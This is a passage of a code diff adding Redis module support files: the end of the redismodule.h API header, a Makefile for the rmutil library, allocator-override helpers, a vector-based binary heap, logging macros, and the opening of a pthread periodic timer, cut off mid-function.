+int REDISMODULE_API_FUNC(RedisModule_ZsetRem)(RedisModuleKey *key, RedisModuleString *ele, int *deleted);
+void REDISMODULE_API_FUNC(RedisModule_ZsetRangeStop)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_ZsetFirstInScoreRange)(RedisModuleKey *key, double min, double max, int minex, int maxex);
+int REDISMODULE_API_FUNC(RedisModule_ZsetLastInScoreRange)(RedisModuleKey *key, double min, double max, int minex, int maxex);
+int REDISMODULE_API_FUNC(RedisModule_ZsetFirstInLexRange)(RedisModuleKey *key, RedisModuleString *min, RedisModuleString *max);
+int REDISMODULE_API_FUNC(RedisModule_ZsetLastInLexRange)(RedisModuleKey *key, RedisModuleString *min, RedisModuleString *max);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_ZsetRangeCurrentElement)(RedisModuleKey *key, double *score);
+int REDISMODULE_API_FUNC(RedisModule_ZsetRangeNext)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_ZsetRangePrev)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_ZsetRangeEndReached)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_HashSet)(RedisModuleKey *key, int flags, ...);
+int REDISMODULE_API_FUNC(RedisModule_HashGet)(RedisModuleKey *key, int flags, ...);
+int REDISMODULE_API_FUNC(RedisModule_IsKeysPositionRequest)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_KeyAtPos)(RedisModuleCtx *ctx, int pos);
+unsigned long long REDISMODULE_API_FUNC(RedisModule_GetClientId)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_GetContextFlags)(RedisModuleCtx *ctx);
+void *REDISMODULE_API_FUNC(RedisModule_PoolAlloc)(RedisModuleCtx *ctx, size_t bytes);
+RedisModuleType *REDISMODULE_API_FUNC(RedisModule_CreateDataType)(RedisModuleCtx *ctx, const char *name, int encver, RedisModuleTypeMethods *typemethods);
+int REDISMODULE_API_FUNC(RedisModule_ModuleTypeSetValue)(RedisModuleKey *key, RedisModuleType *mt, void *value);
+RedisModuleType *REDISMODULE_API_FUNC(RedisModule_ModuleTypeGetType)(RedisModuleKey *key);
+void *REDISMODULE_API_FUNC(RedisModule_ModuleTypeGetValue)(RedisModuleKey *key);
+void REDISMODULE_API_FUNC(RedisModule_SaveUnsigned)(RedisModuleIO *io, uint64_t value);
+uint64_t REDISMODULE_API_FUNC(RedisModule_LoadUnsigned)(RedisModuleIO *io);
+void REDISMODULE_API_FUNC(RedisModule_SaveSigned)(RedisModuleIO *io, int64_t value);
+int64_t REDISMODULE_API_FUNC(RedisModule_LoadSigned)(RedisModuleIO *io);
+void REDISMODULE_API_FUNC(RedisModule_EmitAOF)(RedisModuleIO *io, const char *cmdname, const char *fmt, ...);
+void REDISMODULE_API_FUNC(RedisModule_SaveString)(RedisModuleIO *io, RedisModuleString *s);
+void REDISMODULE_API_FUNC(RedisModule_SaveStringBuffer)(RedisModuleIO *io, const char *str, size_t len);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_LoadString)(RedisModuleIO *io);
+char *REDISMODULE_API_FUNC(RedisModule_LoadStringBuffer)(RedisModuleIO *io, size_t *lenptr);
+void REDISMODULE_API_FUNC(RedisModule_SaveDouble)(RedisModuleIO *io, double value);
+double REDISMODULE_API_FUNC(RedisModule_LoadDouble)(RedisModuleIO *io);
+void REDISMODULE_API_FUNC(RedisModule_SaveFloat)(RedisModuleIO *io, float value);
+float REDISMODULE_API_FUNC(RedisModule_LoadFloat)(RedisModuleIO *io);
+void REDISMODULE_API_FUNC(RedisModule_Log)(RedisModuleCtx *ctx, const char *level, const char *fmt, ...);
+void REDISMODULE_API_FUNC(RedisModule_LogIOError)(RedisModuleIO *io, const char *levelstr, const char *fmt, ...);
+int REDISMODULE_API_FUNC(RedisModule_StringAppendBuffer)(RedisModuleCtx *ctx, RedisModuleString *str, const char *buf, size_t len);
+void REDISMODULE_API_FUNC(RedisModule_RetainString)(RedisModuleCtx *ctx, RedisModuleString *str);
+int REDISMODULE_API_FUNC(RedisModule_StringCompare)(RedisModuleString *a, RedisModuleString *b);
+RedisModuleCtx *REDISMODULE_API_FUNC(RedisModule_GetContextFromIO)(RedisModuleIO *io);
+long long REDISMODULE_API_FUNC(RedisModule_Milliseconds)(void);
+void REDISMODULE_API_FUNC(RedisModule_DigestAddStringBuffer)(RedisModuleDigest *md, unsigned char *ele, size_t len);
+void REDISMODULE_API_FUNC(RedisModule_DigestAddLongLong)(RedisModuleDigest *md, long long ele);
+void REDISMODULE_API_FUNC(RedisModule_DigestEndSequence)(RedisModuleDigest *md);
+RedisModuleDict *REDISMODULE_API_FUNC(RedisModule_CreateDict)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_FreeDict)(RedisModuleCtx *ctx, RedisModuleDict *d);
+uint64_t REDISMODULE_API_FUNC(RedisModule_DictSize)(RedisModuleDict *d);
+int REDISMODULE_API_FUNC(RedisModule_DictSetC)(RedisModuleDict *d, void *key, size_t keylen, void *ptr);
+int REDISMODULE_API_FUNC(RedisModule_DictReplaceC)(RedisModuleDict *d, void *key, size_t keylen, void *ptr);
+int REDISMODULE_API_FUNC(RedisModule_DictSet)(RedisModuleDict *d, RedisModuleString *key, void *ptr);
+int REDISMODULE_API_FUNC(RedisModule_DictReplace)(RedisModuleDict *d, RedisModuleString *key, void *ptr);
+void *REDISMODULE_API_FUNC(RedisModule_DictGetC)(RedisModuleDict *d, void *key, size_t keylen, int *nokey);
+void *REDISMODULE_API_FUNC(RedisModule_DictGet)(RedisModuleDict *d, RedisModuleString *key, int *nokey);
+int REDISMODULE_API_FUNC(RedisModule_DictDelC)(RedisModuleDict *d, void *key, size_t keylen, void *oldval);
+int REDISMODULE_API_FUNC(RedisModule_DictDel)(RedisModuleDict *d, RedisModuleString *key, void *oldval);
+RedisModuleDictIter *REDISMODULE_API_FUNC(RedisModule_DictIteratorStartC)(RedisModuleDict *d, const char *op, void *key, size_t keylen);
+RedisModuleDictIter *REDISMODULE_API_FUNC(RedisModule_DictIteratorStart)(RedisModuleDict *d, const char *op, RedisModuleString *key);
+void REDISMODULE_API_FUNC(RedisModule_DictIteratorStop)(RedisModuleDictIter *di);
+int REDISMODULE_API_FUNC(RedisModule_DictIteratorReseekC)(RedisModuleDictIter *di, const char *op, void *key, size_t keylen);
+int REDISMODULE_API_FUNC(RedisModule_DictIteratorReseek)(RedisModuleDictIter *di, const char *op, RedisModuleString *key);
+void *REDISMODULE_API_FUNC(RedisModule_DictNextC)(RedisModuleDictIter *di, size_t *keylen, void **dataptr);
+void *REDISMODULE_API_FUNC(RedisModule_DictPrevC)(RedisModuleDictIter *di, size_t *keylen, void **dataptr);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_DictNext)(RedisModuleCtx *ctx, RedisModuleDictIter *di, void **dataptr);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_DictPrev)(RedisModuleCtx *ctx, RedisModuleDictIter *di, void **dataptr);
+int REDISMODULE_API_FUNC(RedisModule_DictCompareC)(RedisModuleDictIter *di, const char *op, void *key, size_t keylen);
+int REDISMODULE_API_FUNC(RedisModule_DictCompare)(RedisModuleDictIter *di, const char *op, RedisModuleString *key);
+
+/* Experimental APIs */
+#ifdef REDISMODULE_EXPERIMENTAL_API
+#define REDISMODULE_EXPERIMENTAL_API_VERSION 3
+RedisModuleBlockedClient *REDISMODULE_API_FUNC(RedisModule_BlockClient)(RedisModuleCtx *ctx, RedisModuleCmdFunc reply_callback, RedisModuleCmdFunc timeout_callback, void (*free_privdata)(RedisModuleCtx*,void*), long long timeout_ms);
+int REDISMODULE_API_FUNC(RedisModule_UnblockClient)(RedisModuleBlockedClient *bc, void *privdata);
+int REDISMODULE_API_FUNC(RedisModule_IsBlockedReplyRequest)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_IsBlockedTimeoutRequest)(RedisModuleCtx *ctx);
+void *REDISMODULE_API_FUNC(RedisModule_GetBlockedClientPrivateData)(RedisModuleCtx *ctx);
+RedisModuleBlockedClient *REDISMODULE_API_FUNC(RedisModule_GetBlockedClientHandle)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_AbortBlock)(RedisModuleBlockedClient *bc);
+RedisModuleCtx *REDISMODULE_API_FUNC(RedisModule_GetThreadSafeContext)(RedisModuleBlockedClient *bc);
+void REDISMODULE_API_FUNC(RedisModule_FreeThreadSafeContext)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_ThreadSafeContextLock)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_ThreadSafeContextUnlock)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_SubscribeToKeyspaceEvents)(RedisModuleCtx *ctx, int types, RedisModuleNotificationFunc cb);
+int REDISMODULE_API_FUNC(RedisModule_BlockedClientDisconnected)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_RegisterClusterMessageReceiver)(RedisModuleCtx *ctx, uint8_t type, RedisModuleClusterMessageReceiver callback);
+int REDISMODULE_API_FUNC(RedisModule_SendClusterMessage)(RedisModuleCtx *ctx, char *target_id, uint8_t type, unsigned char *msg, uint32_t len);
+int REDISMODULE_API_FUNC(RedisModule_GetClusterNodeInfo)(RedisModuleCtx *ctx, const char *id, char *ip, char *master_id, int *port, int *flags);
+char **REDISMODULE_API_FUNC(RedisModule_GetClusterNodesList)(RedisModuleCtx *ctx, size_t *numnodes);
+void REDISMODULE_API_FUNC(RedisModule_FreeClusterNodesList)(char **ids);
+RedisModuleTimerID REDISMODULE_API_FUNC(RedisModule_CreateTimer)(RedisModuleCtx *ctx, mstime_t period, RedisModuleTimerProc callback, void *data);
+int REDISMODULE_API_FUNC(RedisModule_StopTimer)(RedisModuleCtx *ctx, RedisModuleTimerID id, void **data);
+int REDISMODULE_API_FUNC(RedisModule_GetTimerInfo)(RedisModuleCtx *ctx, RedisModuleTimerID id, uint64_t *remaining, void **data);
+const char *REDISMODULE_API_FUNC(RedisModule_GetMyClusterID)(void);
+size_t REDISMODULE_API_FUNC(RedisModule_GetClusterSize)(void);
+void REDISMODULE_API_FUNC(RedisModule_GetRandomBytes)(unsigned char *dst, size_t len);
+void REDISMODULE_API_FUNC(RedisModule_GetRandomHexChars)(char *dst, size_t len);
+void REDISMODULE_API_FUNC(RedisModule_SetDisconnectCallback)(RedisModuleBlockedClient *bc, RedisModuleDisconnectFunc callback);
+void REDISMODULE_API_FUNC(RedisModule_SetClusterFlags)(RedisModuleCtx *ctx, uint64_t flags);
+#endif
+
+/* This is included inline inside each Redis module. */
+static int RedisModule_Init(RedisModuleCtx *ctx, const char *name, int ver, int apiver) __attribute__((unused));
+static int RedisModule_Init(RedisModuleCtx *ctx, const char *name, int ver, int apiver) {
+    void *getapifuncptr = ((void**)ctx)[0];
+    RedisModule_GetApi = (int (*)(const char *, void *)) (unsigned long)getapifuncptr;
+    REDISMODULE_GET_API(Alloc);
+    REDISMODULE_GET_API(Calloc);
+    REDISMODULE_GET_API(Free);
+    REDISMODULE_GET_API(Realloc);
+    REDISMODULE_GET_API(Strdup);
+    REDISMODULE_GET_API(CreateCommand);
+    REDISMODULE_GET_API(SetModuleAttribs);
+    REDISMODULE_GET_API(IsModuleNameBusy);
+    REDISMODULE_GET_API(WrongArity);
+    REDISMODULE_GET_API(ReplyWithLongLong);
+    REDISMODULE_GET_API(ReplyWithError);
+    REDISMODULE_GET_API(ReplyWithSimpleString);
+    REDISMODULE_GET_API(ReplyWithArray);
+    REDISMODULE_GET_API(ReplySetArrayLength);
+    REDISMODULE_GET_API(ReplyWithStringBuffer);
+    REDISMODULE_GET_API(ReplyWithString);
+    REDISMODULE_GET_API(ReplyWithNull);
+    REDISMODULE_GET_API(ReplyWithCallReply);
+    REDISMODULE_GET_API(ReplyWithDouble);
+    REDISMODULE_GET_API(ReplySetArrayLength);
+    REDISMODULE_GET_API(GetSelectedDb);
+    REDISMODULE_GET_API(SelectDb);
+    REDISMODULE_GET_API(OpenKey);
+    REDISMODULE_GET_API(CloseKey);
+    REDISMODULE_GET_API(KeyType);
+    REDISMODULE_GET_API(ValueLength);
+    REDISMODULE_GET_API(ListPush);
+    REDISMODULE_GET_API(ListPop);
+    REDISMODULE_GET_API(StringToLongLong);
+    REDISMODULE_GET_API(StringToDouble);
+    REDISMODULE_GET_API(Call);
+    REDISMODULE_GET_API(CallReplyProto);
+    REDISMODULE_GET_API(FreeCallReply);
+    REDISMODULE_GET_API(CallReplyInteger);
+    REDISMODULE_GET_API(CallReplyType);
+    REDISMODULE_GET_API(CallReplyLength);
+    REDISMODULE_GET_API(CallReplyArrayElement);
+    REDISMODULE_GET_API(CallReplyStringPtr);
+    REDISMODULE_GET_API(CreateStringFromCallReply);
+    REDISMODULE_GET_API(CreateString);
+    REDISMODULE_GET_API(CreateStringFromLongLong);
+    REDISMODULE_GET_API(CreateStringFromString);
+    REDISMODULE_GET_API(CreateStringPrintf);
+    REDISMODULE_GET_API(FreeString);
+    REDISMODULE_GET_API(StringPtrLen);
+    REDISMODULE_GET_API(AutoMemory);
+    REDISMODULE_GET_API(Replicate);
+    REDISMODULE_GET_API(ReplicateVerbatim);
+    REDISMODULE_GET_API(DeleteKey);
+    REDISMODULE_GET_API(UnlinkKey);
+    REDISMODULE_GET_API(StringSet);
+    REDISMODULE_GET_API(StringDMA);
+    REDISMODULE_GET_API(StringTruncate);
+    REDISMODULE_GET_API(GetExpire);
+    REDISMODULE_GET_API(SetExpire);
+    REDISMODULE_GET_API(ZsetAdd);
+    REDISMODULE_GET_API(ZsetIncrby);
+    REDISMODULE_GET_API(ZsetScore);
+    REDISMODULE_GET_API(ZsetRem);
+    REDISMODULE_GET_API(ZsetRangeStop);
+    REDISMODULE_GET_API(ZsetFirstInScoreRange);
+    REDISMODULE_GET_API(ZsetLastInScoreRange);
+    REDISMODULE_GET_API(ZsetFirstInLexRange);
+    REDISMODULE_GET_API(ZsetLastInLexRange);
+    REDISMODULE_GET_API(ZsetRangeCurrentElement);
+    REDISMODULE_GET_API(ZsetRangeNext);
+    REDISMODULE_GET_API(ZsetRangePrev);
+    REDISMODULE_GET_API(ZsetRangeEndReached);
+    REDISMODULE_GET_API(HashSet);
+    REDISMODULE_GET_API(HashGet);
+    REDISMODULE_GET_API(IsKeysPositionRequest);
+    REDISMODULE_GET_API(KeyAtPos);
+    REDISMODULE_GET_API(GetClientId);
+    REDISMODULE_GET_API(GetContextFlags);
+    REDISMODULE_GET_API(PoolAlloc);
+    REDISMODULE_GET_API(CreateDataType);
+    REDISMODULE_GET_API(ModuleTypeSetValue);
+    REDISMODULE_GET_API(ModuleTypeGetType);
+    REDISMODULE_GET_API(ModuleTypeGetValue);
+    REDISMODULE_GET_API(SaveUnsigned);
+    REDISMODULE_GET_API(LoadUnsigned);
+    REDISMODULE_GET_API(SaveSigned);
+    REDISMODULE_GET_API(LoadSigned);
+    REDISMODULE_GET_API(SaveString);
+    REDISMODULE_GET_API(SaveStringBuffer);
+    REDISMODULE_GET_API(LoadString);
+    REDISMODULE_GET_API(LoadStringBuffer);
+    REDISMODULE_GET_API(SaveDouble);
+    REDISMODULE_GET_API(LoadDouble);
+    REDISMODULE_GET_API(SaveFloat);
+    REDISMODULE_GET_API(LoadFloat);
+    REDISMODULE_GET_API(EmitAOF);
+    REDISMODULE_GET_API(Log);
+    REDISMODULE_GET_API(LogIOError);
+    REDISMODULE_GET_API(StringAppendBuffer);
+    REDISMODULE_GET_API(RetainString);
+    REDISMODULE_GET_API(StringCompare);
+    REDISMODULE_GET_API(GetContextFromIO);
+    REDISMODULE_GET_API(Milliseconds);
+    REDISMODULE_GET_API(DigestAddStringBuffer);
+    REDISMODULE_GET_API(DigestAddLongLong);
+    REDISMODULE_GET_API(DigestEndSequence);
+    REDISMODULE_GET_API(CreateDict);
+    REDISMODULE_GET_API(FreeDict);
+    REDISMODULE_GET_API(DictSize);
+    REDISMODULE_GET_API(DictSetC);
+    REDISMODULE_GET_API(DictReplaceC);
+    REDISMODULE_GET_API(DictSet);
+    REDISMODULE_GET_API(DictReplace);
+    REDISMODULE_GET_API(DictGetC);
+    REDISMODULE_GET_API(DictGet);
+    REDISMODULE_GET_API(DictDelC);
+    REDISMODULE_GET_API(DictDel);
+    REDISMODULE_GET_API(DictIteratorStartC);
+    REDISMODULE_GET_API(DictIteratorStart);
+    REDISMODULE_GET_API(DictIteratorStop);
+    REDISMODULE_GET_API(DictIteratorReseekC);
+    REDISMODULE_GET_API(DictIteratorReseek);
+    REDISMODULE_GET_API(DictNextC);
+    REDISMODULE_GET_API(DictPrevC);
+    REDISMODULE_GET_API(DictNext);
+    REDISMODULE_GET_API(DictPrev);
+    REDISMODULE_GET_API(DictCompare);
+    REDISMODULE_GET_API(DictCompareC);
+
+#ifdef REDISMODULE_EXPERIMENTAL_API
+    REDISMODULE_GET_API(GetThreadSafeContext);
+    REDISMODULE_GET_API(FreeThreadSafeContext);
+    REDISMODULE_GET_API(ThreadSafeContextLock);
+    REDISMODULE_GET_API(ThreadSafeContextUnlock);
+    REDISMODULE_GET_API(BlockClient);
+    REDISMODULE_GET_API(UnblockClient);
+    REDISMODULE_GET_API(IsBlockedReplyRequest);
+    REDISMODULE_GET_API(IsBlockedTimeoutRequest);
+    REDISMODULE_GET_API(GetBlockedClientPrivateData);
+    REDISMODULE_GET_API(GetBlockedClientHandle);
+    REDISMODULE_GET_API(AbortBlock);
+    REDISMODULE_GET_API(SetDisconnectCallback);
+    REDISMODULE_GET_API(SubscribeToKeyspaceEvents);
+    REDISMODULE_GET_API(BlockedClientDisconnected);
+    REDISMODULE_GET_API(RegisterClusterMessageReceiver);
+    REDISMODULE_GET_API(SendClusterMessage);
+    REDISMODULE_GET_API(GetClusterNodeInfo);
+    REDISMODULE_GET_API(GetClusterNodesList);
+    REDISMODULE_GET_API(FreeClusterNodesList);
+    REDISMODULE_GET_API(CreateTimer);
+    REDISMODULE_GET_API(StopTimer);
+    REDISMODULE_GET_API(GetTimerInfo);
+    REDISMODULE_GET_API(GetMyClusterID);
+    REDISMODULE_GET_API(GetClusterSize);
+    REDISMODULE_GET_API(GetRandomBytes);
+    REDISMODULE_GET_API(GetRandomHexChars);
+    REDISMODULE_GET_API(SetClusterFlags);
+#endif
+
+    if (RedisModule_IsModuleNameBusy && RedisModule_IsModuleNameBusy(name)) return REDISMODULE_ERR;
+    RedisModule_SetModuleAttribs(ctx,name,ver,apiver);
+    return REDISMODULE_OK;
+}
+
+#else
+
+/* Things only defined for the modules core, not exported to modules
+ * including this file. */
+#define RedisModuleString robj
+
+#endif /* REDISMODULE_CORE */
+#endif /* REDISMOUDLE_H */
@@ -0,0 +1,31 @@
+# set environment variable RM_INCLUDE_DIR to the location of redismodule.h
+ifndef RM_INCLUDE_DIR
+	RM_INCLUDE_DIR=../
+endif
+
+CFLAGS ?= -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function
+CFLAGS += -I$(RM_INCLUDE_DIR)
+CC=gcc
+
+OBJS=util.o strings.o sds.o vector.o alloc.o periodic.o
+
+all: librmutil.a
+
+clean:
+	rm -rf *.o *.a
+
+librmutil.a: $(OBJS)
+	ar rcs $@ $^
+
+test_vector: test_vector.o vector.o
+	$(CC) -Wall -o $@ $^ -lc -lpthread -O0
+	@(sh -c ./$@)
+.PHONY: test_vector
+
+test_periodic: test_periodic.o periodic.o
+	$(CC) -Wall -o $@ $^ -lc -lpthread -O0
+	@(sh -c ./$@)
+.PHONY: test_periodic
+	
+test: test_periodic test_vector
+.PHONY: test
@@ -0,0 +1,32 @@
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include "alloc.h"
+
+/* A patched implementation of strdup that will use our patched calloc */
+char *rmalloc_strndup(const char *s, size_t n) {
+  char *ret = calloc(n + 1, sizeof(char));
+  if (ret)
+    memcpy(ret, s, n);
+  return ret;
+}
+
+/*
+ * Re-patching RedisModule_Alloc and friends to the original malloc functions
+ *
+ * This function should be called if you are working with malloc-patched code
+ * outside of redis, usually for unit tests. Call it once when entering your unit
+ * tests' main().
+ *
+ * Since including "alloc.h" while defining REDIS_MODULE_TARGET
+ * replaces all malloc functions in redis with the RM_Alloc family of functions,
+ * when running that code outside of redis, your app will crash. This function
+ * patches the RM_Alloc functions back to the original mallocs. */
+void RMUTil_InitAlloc() {
+
+  RedisModule_Alloc = malloc;
+  RedisModule_Realloc = realloc;
+  RedisModule_Calloc = calloc;
+  RedisModule_Free = free;
+  RedisModule_Strdup = strdup;
+}
@@ -0,0 +1,51 @@
+#ifndef __RMUTIL_ALLOC__
+#define __RMUTIL_ALLOC__
+
+/* Automatic Redis Module Allocation functions monkey-patching.
+ *
+ * Including this file while REDIS_MODULE_TARGET is defined, will explicitly
+ * override malloc, calloc, realloc & free with RedisModule_Alloc,
+ * RedisModule_Callc, etc implementations, that allow Redis better control and
+ * reporting over allocations per module.
+ *
+ * You should include this file in all c files AS THE LAST INCLUDED FILE
+ *
+ * This only has effect when when compiling with the macro REDIS_MODULE_TARGET
+ * defined. The idea is that for unit tests it will not be defined, but for the
+ * module build target it will be.
+ *
+ */
+
+#include <stdlib.h>
+#include <redismodule.h>
+
+char *rmalloc_strndup(const char *s, size_t n);
+
+#ifdef REDIS_MODULE_TARGET /* Set this when compiling your code as a module */
+
+#define malloc(size) RedisModule_Alloc(size)
+#define calloc(count, size) RedisModule_Calloc(count, size)
+#define realloc(ptr, size) RedisModule_Realloc(ptr, size)
+#define free(ptr) RedisModule_Free(ptr)
+
+#ifdef strdup
+#undef strdup
+#endif
+#define strdup(ptr) RedisModule_Strdup(ptr)
+
+/* More overriding */
+// needed to avoid calling strndup->malloc
+#ifdef strndup
+#undef strndup
+#endif
+#define strndup(s, n) rmalloc_strndup(s, n)
+
+#else
+
+#endif /* REDIS_MODULE_TARGET */
+/* This function should be called if you are working with malloc-patched code
+ * outside of redis, usually for unit tests. Call it once when entering your unit
+ * tests' main() */
+void RMUTil_InitAlloc();
+
+#endif /* __RMUTIL_ALLOC__ */
@@ -0,0 +1,107 @@
+#include "heap.h"
+
+/* Byte-wise swap two items of size SIZE. */
+#define SWAP(a, b, size)                      \
+  do                                          \
+    {                                         \
+      register size_t __size = (size);        \
+      register char *__a = (a), *__b = (b);   \
+      do                                      \
+        {                                     \
+          char __tmp = *__a;                  \
+          *__a++ = *__b;                      \
+          *__b++ = __tmp;                     \
+        } while (--__size > 0);               \
+    } while (0)
+
+inline char *__vector_GetPtr(Vector *v, size_t pos) {
+    return v->data + (pos * v->elemSize);
+}
+
+void __sift_up(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) {
+    size_t len = last - first;
+    if (len > 1) {
+        len = (len - 2) / 2;
+        size_t ptr = first + len;
+        if (cmp(__vector_GetPtr(v, ptr), __vector_GetPtr(v, --last)) < 0) {
+            char t[v->elemSize];
+            memcpy(t, __vector_GetPtr(v, last), v->elemSize);
+            do {
+                memcpy(__vector_GetPtr(v, last), __vector_GetPtr(v, ptr), v->elemSize);
+                last = ptr;
+                if (len == 0)
+                    break;
+                len = (len - 1) / 2;
+                ptr = first + len;
+            } while (cmp(__vector_GetPtr(v, ptr), t) < 0);
+            memcpy(__vector_GetPtr(v, last), t, v->elemSize);
+        }
+    }
+}
+
+void __sift_down(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *), size_t start) {
+    // left-child of __start is at 2 * __start + 1
+    // right-child of __start is at 2 * __start + 2
+    size_t len = last - first;
+    size_t child = start - first;
+
+    if (len < 2 || (len - 2) / 2 < child)
+        return;
+
+    child = 2 * child + 1;
+
+    if ((child + 1) < len && cmp(__vector_GetPtr(v, first + child), __vector_GetPtr(v, first + child + 1)) < 0) {
+        // right-child exists and is greater than left-child
+        ++child;
+    }
+
+    // check if we are in heap-order
+    if (cmp(__vector_GetPtr(v, first + child), __vector_GetPtr(v, start)) < 0)
+        // we are, __start is larger than it's largest child
+        return;
+
+    char top[v->elemSize];
+    memcpy(top, __vector_GetPtr(v, start), v->elemSize);
+    do {
+        // we are not in heap-order, swap the parent with it's largest child
+        memcpy(__vector_GetPtr(v, start), __vector_GetPtr(v, first + child), v->elemSize);
+        start = first + child;
+
+        if ((len - 2) / 2 < child)
+            break;
+
+        // recompute the child based off of the updated parent
+        child = 2 * child + 1;
+
+        if ((child + 1) < len && cmp(__vector_GetPtr(v, first + child), __vector_GetPtr(v, first + child + 1)) < 0) {
+            // right-child exists and is greater than left-child
+            ++child;
+        }
+
+        // check if we are in heap-order
+    } while (cmp(__vector_GetPtr(v, first + child), top) >= 0);
+    memcpy(__vector_GetPtr(v, start), top, v->elemSize);
+}
+
+
+void Make_Heap(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) {
+    if (last - first > 1) {
+        // start from the first parent, there is no need to consider children
+        for (int start = (last - first - 2) / 2; start >= 0; --start) {
+            __sift_down(v, first, last, cmp, first + start);
+        }
+    }
+}
+
+
+inline void Heap_Push(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) {
+    __sift_up(v, first, last, cmp);
+}
+
+
+inline void Heap_Pop(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) {
+    if (last - first > 1) {
+        SWAP(__vector_GetPtr(v, first), __vector_GetPtr(v, --last), v->elemSize);
+        __sift_down(v, first, last, cmp, first);
+    }
+}
@@ -0,0 +1,38 @@
+#ifndef __HEAP_H__
+#define __HEAP_H__
+
+#include "vector.h"
+
+
+/* Make heap from range
+ * Rearranges the elements in the range [first,last) in such a way that they form a heap.
+ * A heap is a way to organize the elements of a range that allows for fast retrieval of the element with the highest
+ * value at any moment (with pop_heap), even repeatedly, while allowing for fast insertion of new elements (with
+ * push_heap).
+ * The element with the highest value is always pointed by first. The order of the other elements depends on the
+ * particular implementation, but it is consistent throughout all heap-related functions of this header.
+ * The elements are compared using cmp.
+ */
+void Make_Heap(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *));
+
+
+/* Push element into heap range
+ * Given a heap in the range [first,last-1), this function extends the range considered a heap to [first,last) by
+ * placing the value in (last-1) into its corresponding location within it.
+ * A range can be organized into a heap by calling make_heap. After that, its heap properties are preserved if elements
+ * are added and removed from it using push_heap and pop_heap, respectively.
+ */
+void Heap_Push(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *));
+
+
+/* Pop element from heap range
+ * Rearranges the elements in the heap range [first,last) in such a way that the part considered a heap is shortened
+ * by one: The element with the highest value is moved to (last-1).
+ * While the element with the highest value is moved from first to (last-1) (which now is out of the heap), the other
+ * elements are reorganized in such a way that the range [first,last-1) preserves the properties of a heap.
+ * A range can be organized into a heap by calling make_heap. After that, its heap properties are preserved if elements
+ * are added and removed from it using push_heap and pop_heap, respectively.
+ */
+void Heap_Pop(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *));
+
+#endif //__HEAP_H__
@@ -0,0 +1,11 @@
+#ifndef __RMUTIL_LOGGING_H__
+#define __RMUTIL_LOGGING_H__
+
+/* Convenience macros for redis logging */
+
+#define RM_LOG_DEBUG(ctx, ...) RedisModule_Log(ctx, "debug", __VA_ARGS__)
+#define RM_LOG_VERBOSE(ctx, ...) RedisModule_Log(ctx, "verbose", __VA_ARGS__)
+#define RM_LOG_NOTICE(ctx, ...) RedisModule_Log(ctx, "notice", __VA_ARGS__)
+#define RM_LOG_WARNING(ctx, ...) RedisModule_Log(ctx, "warning", __VA_ARGS__)
+
+#endif
@@ -0,0 +1,88 @@
+#define REDISMODULE_EXPERIMENTAL_API
+#include "periodic.h"
+#include <pthread.h>
+#include <stdlib.h>
+#include <errno.h>
+
+typedef struct RMUtilTimer {
+  RMutilTimerFunc cb;
+  RMUtilTimerTerminationFunc onTerm;
+  void *privdata;
+  struct timespec interval;
+  pthread_t thread;
+  pthread_mutex_t lock;
+  pthread_cond_t cond;
+} RMUtilTimer;
+
+static struct timespec timespecAdd(struct timespec *a, struct timespec *b) {
+  struct timespec ret;
+  ret.tv_sec = a->tv_sec + b->tv_sec;
+
+  long long ns = a->tv_nsec + b->tv_nsec;
+  ret.tv_sec += ns / 1000000000;
+  ret.tv_nsec = ns % 1000000000;
+  return ret;
+}
+
+static void *rmutilTimer_Loop(void *ctx) {
+  RMUtilTimer *tm = ctx;
+
+  int rc = ETIMEDOUT;
+  struct timespec ts;
+
+  pthread_mutex_lock(&tm->lock);
+  while (rc != 0) {
+    clock_gettime(CLOCK_REALTIME, &ts);
+    struct timespec timeout = timespecAdd(&ts, &tm->interval);
+    if ((rc = pthread_cond_timedwait(&tm->cond, &tm->lock, &timeout)) == ETIMEDOUT) {
+
+      // Create a thread safe context if we're running inside redis
+      RedisModuleCtx *rctx = NULL;
+      if (RedisModule_GetThreadSafeContext) rctx = RedisModule_GetThreadSafeContext(NULL);
+
+      // call our callback...
+      tm->cb(rctx, tm->privdata);
+
+      // If needed - free the thread safe context.
+      // It's up to the user to decide whether automemory is active there
+      if (rctx) RedisModule_FreeThreadSafeContext(rctx);
+    }
+    if (rc == EINVAL) {
+      perror("Error waiting for condition");
+      break;
+    }
+  }
+
+  // call the termination callback if needed
+  if (tm->onTerm != NULL) {
+    tm->onTerm(tm->privdata);
+  }
+
+  // free resources associated with the timer
+  pthread_cond_destroy(&tm->cond);
+  free(tm);
+
+  return NULL;
+}
+
+/* set a new frequency for the timer. This will take effect AFTER the next trigger */
+void RMUtilTimer_SetInterval(struct RMUtilTimer *t, struct timespec newInterval) {
+  t->interval = newInterval;
+}
+
+RMUtilTimer *RMUtil_NewPeriodicTimer(RMutilTimerFunc cb, RMUtilTimerTerminationFunc onTerm,
